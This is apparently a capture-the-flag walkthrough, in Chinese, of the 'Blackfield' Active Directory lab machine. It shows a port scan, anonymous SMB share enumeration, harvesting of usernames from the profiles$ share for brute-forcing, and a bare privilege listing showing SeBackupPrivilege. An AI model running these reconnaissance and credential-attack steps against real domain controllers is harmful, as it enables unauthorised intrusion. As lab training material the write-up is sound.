Victim’s IP : 10.10.10.192 Victim’s Host : *.blackfield.locacl Attacker’s IP : 10.10.14.14
RECON
port scan
Command
1
rustscan -a 10.10.10.192 --ulimit 5000 -- -sC -sV -Pn
Result
1 2 3 4 5 6 7 8 9 10 11 12
PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-26 14:03:18Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
又是一台常規的 AD DC,有開 smb, ldap, rpc, kerberos,也能獲得域名:blackfield.local
Exploit
smb info leak
SMB 可以無帳密登入 Command
1
smbclient -L //10.10.10.192/ -N
Result
1 2 3 4 5 6 7 8 9 10 11 12 13
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share forensic Disk Forensic / Audit share. IPC$ IPC Remote IPC NETLOGON Disk Logon server share profiles$ Disk SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT) Unable to connect with SMB1 -- no workgroup available
一一嘗試,於profiles$發現大量使用者名稱,一一進行爆破
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
smbclient //10.10.10.192/profiles$ -N Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jun 3 12:47:12 2020 .. D 0 Wed Jun 3 12:47:12 2020 AAlleni D 0 Wed Jun 3 12:47:11 2020 ABarteski D 0 Wed Jun 3 12:47:11 2020 ABekesz D 0 Wed Jun 3 12:47:11 2020 ABenzies D 0 Wed Jun 3 12:47:11 2020 ABiemiller D 0 Wed Jun 3 12:47:11 2020 AChampken D 0 Wed Jun 3 12:47:11 2020 ACheretei D 0 Wed Jun 3 12:47:11 2020 ACsonaki D 0 Wed Jun 3 12:47:11 2020 AHigchens D 0 Wed Jun 3 12:47:11 2020 AJaquemai D 0 Wed Jun 3 12:47:11 2020 AKlado D 0 Wed Jun 3 12:47:11 2020 AKoffenburger D 0 Wed Jun 3 12:47:11 2020 ......(略)
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled